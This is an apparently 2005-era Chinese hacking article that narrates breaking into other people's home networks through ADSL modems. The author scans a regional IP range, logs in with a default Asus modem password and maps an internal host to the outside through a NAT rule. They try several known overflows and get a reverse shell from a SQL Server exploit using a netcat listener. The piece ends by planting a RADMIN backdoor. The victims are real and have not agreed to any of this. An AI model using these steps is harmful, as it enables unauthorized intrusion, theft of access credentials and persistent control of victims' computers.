让硬件入侵不再是神话
文:ivory (isno_sec@163.com)
现在的入侵手法莫过于一些简单的sql injection填字游戏,这样下去很单调。我最近在研究硬件方面的入侵,也了解了一些从adsl modem和cisco路由器的入侵手法,不敢独享。本文也主要是提供一些具体过程,起个抛砖引玉作用。
一、 从adsl modem的入侵
1. 扫描
现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是我选择了23端口,打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了,开23、80的主机还真不小啊:)我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:adsl PASS:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234),Bingo!一矢中的,现在我就是上帝。
图一、华硕adsl modem主页面
2. 映射
本来我们来到图一所示,拿一下上网密码就OK了。但是我们希望要入侵内网,这里只仅仅成功了一半。要进一步入侵内网,我们要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?开始,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)。后来,我发现华硕的doc/lan_conf.htm配置页面已经记载了所有我们想要得到的信息。如图二。
图二、内网配置架构
我们从这里里面可以看出,adsl modem已经配置了dhcp。我们知道dhcp服务是一个自动分配IP地址的网络服务。我们知道DHCP有个特性就是按顺序分配,而且按照一般家庭网络,最多就几台计算机。据分析,可能存在主机IP地址为192.168.0.110、192.168.0.111两台主机。我们这里直接按照192.168.0.110来做实验。但是192.168.0.110到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网。具体做法如下:进入NAT选项---添加NAT规则---BIMAP---填入主机IP:192.168.0.110,到此192.168.0.110已经透明地映射到192.168.0.1上了,我们访问ADSL MODEM就等于访问主机192.168.0.110了,如图三。
图三、添加映射规则
3. 检测漏洞
现在我们再请出SUPPERSCAN或者其他扫描器对218.xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口有很多,刚才只是开放了80 23 21 而已(也就是说我们的映射已经成功了,另外发现里面有很多误报,不知道是什么原因?其中一部分端口开放是正常的)。该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员水平还不算低啊,(不过大部分安全系数比较低的主机还是存在安全漏洞的),如图四。
图四、superscan后期扫描结果
4. 溢出
既然没有弱口令,也没开80,那只好从溢出方面着手了,但没开80 21 也就webdav .sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行,再利用了一下ms05-024漏洞攻击程序还是不成功的,(其实用什么溢出工具可以自己定,有很多主机是可以直接溢出的)。
5. 募然回首,那人却在,灯火阑珊处
看起来这管理员还是比较负责的,该打的补丁都打上了,这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?)心动不如行动,现在只好死马当活马医了,于是,在cmd行中打入:
Nc –v –l 99
sql2 218.xxx.xxx.xxx 0 xxx.xxx.xxx.xxx 99 |
Bingo!成功地得到一个shell了。
6. 设置后门
到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的。呵呵,这里不详谈了,相信各位都知道。至于别的后门办法,请查看其他的文章。
详情见作者原文:http://blog.csdn.net/allyesno/archive/2005/11/27/538043.aspx |